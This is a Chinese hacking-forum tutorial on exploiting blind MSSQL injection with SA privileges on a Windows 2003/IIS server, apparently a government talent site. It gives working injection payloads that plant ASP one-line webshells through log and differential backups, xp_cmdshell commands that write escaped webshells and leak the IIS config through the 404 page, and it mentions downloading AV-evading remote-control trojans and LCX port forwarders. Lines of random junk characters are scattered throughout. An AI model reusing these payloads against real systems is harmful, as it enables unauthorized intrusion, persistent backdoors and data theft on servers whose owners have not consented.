sa权限的教程.

admin

————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
9 W+ c- J' z3 h

" V' Y" X' C+ c$ ]* m                                                             欢迎高手访问指导，欢迎新手朋友交流学习。

9 y$ i+ {" V. h$ d/ C                                                                 
+ p: O" `8 v& t: G7 ^                                                                 
1 K! ]' {3 U/ R3 S3 e; y                                                                  论坛： http://www.90team.net/

1 g; E5 {2 k+ v9 F  ^
7 r4 f5 o" T' @: B5 J
友情检测国家人才网
+ o7 k! \& y4 }6 `
) D# B. N* R$ G. ~# o# Q. N* L
9 W- i# d7 \* O  u9 {9 l/ n内容：MSSQL注入SA权限不显错模式下的入侵

  H# p0 z; m' n7 N- k) b. p
一般新手扫到不显错的SA（systemadmin）的注入点时，虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了，今天我给大家演示下如何利用。方法很简单大家看操作。

. ~, w1 [) i' g. l2 y& s. r我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
3 u) k  q" E4 I4 l$ V
% z3 T* I6 G, T" h2 \& ]9 r
! W: g# b$ ?- r1 ]这里的主机环境：MSSQL+JSP 权限为不显错的SA，支持多行执行 xp_cmdshell存活 服务器处于内网，WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003，IIS，404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。

% @+ v1 J5 o# W思路：
9 J5 p2 `5 i( v' }5 s$ B5 ?* Q
3 S. i: x: n$ H首先：
. b2 k: ]+ ]0 N9 m7 J
' l# P9 _- z( r9 H* [通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面，然后访问WEB站点的一个不存在的目录得到命令执行结果，刺探服务器信息。

: D  k) R# ~4 _2 l8 Z4 {1.日志备份获得Webshell
- c) L/ @" s' P0 U6 J/ h/ H8 D
0 z1 a% x7 \2 @  Q/ V  x8 C2.数据库差异备份获得Webshell

6 Z' ^4 y1 _/ O5 E4.直接下载免杀远控木马。
3 `  T: c; `. \8 L* [
* @% v. c- Z0 ^# ]0 J7 @+ D+ F5.直接下载LCX将服务器端口转发出来

+ P) J7 X( i  @! k5 ]7 L6.通过XP_CMDSHELL 执行命令读取iis配置文件（C:\Windows\system32\inetsrv\MetaBase.xml ）分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
4 t: {0 _! m; [/ l5 y& p
/ N8 \0 j  ]4 d# ^) d
$ Z- n7 v1 l, A8 I7 E! k
* m5 `* ~& @  F) F在这里我就不浪费大家时间了，我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了，

我直接演示后面一个方法
- f  C, P0 s; Q5 x  s8 W$ O: o  R
9 R2 m# M: s; J0 p3 h
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL

9 K5 ~$ x' s$ I" }2 s
) ~- s( N- `! o3 j7 e; `
; i2 y& @4 R4 }1 l
◆日志备份：


1. 进行初始备份
' f+ G) L1 {8 ]8 F( b; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--

& I1 _+ T0 ^3 e" E! }) W* F2. 插入数据
  e: {. \" X. C1 `) @;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--

0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
  
3. 备份并获得文件，删除临时表
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
( o: e$ U- `3 a
7 N3 ~2 q( r- I& Z9 N+ Q) P
" \0 M( M/ ?3 A% _) A, I
& O& g$ Y0 m3 B% u' V3 v& w# a◆数据库差异备份

+ T0 O/ m" A2 ^- e4 }& v（1. 进行差异备份准备工作
8 A9 e5 `2 }! s: P9 ?, M' }9 ]
0 I+ P! F1 i% ]( }8 z" `: _8 C;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--

  y' F5 W6 r" e3 y5 v上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码


9 F" v$ S2 `' M# W+ [6 m+ C+ Q  D（2. 将数据写入到数据库
( y9 L! k4 H; a: D. [  i;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
4 M0 X" s. J# K) k% \" k+ t9 Y6 N
6 ]0 n- S: D' e4 p: H" o3 W2 @6 p0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>

3. 备份数据库并清理临时文件

;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
* ?' b* ?; r. l( l( ]* y) E
* ]2 d( q7 ?+ }8 v. r0x633A5C746573742E617370  为 c:\test.asp  删除临时文件



用^转义字符来写ASP(一句话木马)文件的方法:   

. _0 Q% D% o, `# \8 l1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--

2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp

读取IIS配置信息获取web路径

5 v2 A. s% {- ^9 N     
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--

- H" ?) M' W" g" e& D! b& ?执行命令
     
* o3 U  C4 q7 `& G9 F     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
/ |, O0 b9 p+ x& E. n
) x* `$ F: ]4 I/ e9 f- j8 o5 F3 n+ ?
6 W1 \. b( ]) n




3 w, J" ~, N- B: B
' @5 o: o7 c: n. s4 P% v! q



2 A3 V" E* o! p, B; {" l7 I


* B1 b9 {( Q& \$ @" |, R. J

* l5 U5 O: l# F5 [1 u8 [7 ^  ~0 D

$ r* B. n5 B- S) e/ q( B  }0 x" q& o

7 S, A+ M1 p+ r
- Z# h! Z9 o9 o# w& U7 N# c
) t$ K0 v( D" b7 P( j( ~
% f: W$ I' R" S1 H' S. l7 w6 x




% t- y% n) F6 A0 I. ^, ~. L
* V$ M; X: A; `6 \+ {5 Y5 R

( Y, Y5 e5 ~. M4 J+ e) k" J* j8 Y
/ H/ \7 f+ p# `; V1 E4 A
5 L+ M' n1 D& X" \





1 U" ~0 s. G3 f

* U. Z; {0 B# g6 d
& V- N- T; ?& M
* G: Y, f6 a1 ^9 I8 ^0 x! v

% z7 ^* [" p# ^# B5 I" H' v
$ X+ _; v9 e/ B: Y
$ A7 b6 A3 Q8 D: U& R8 I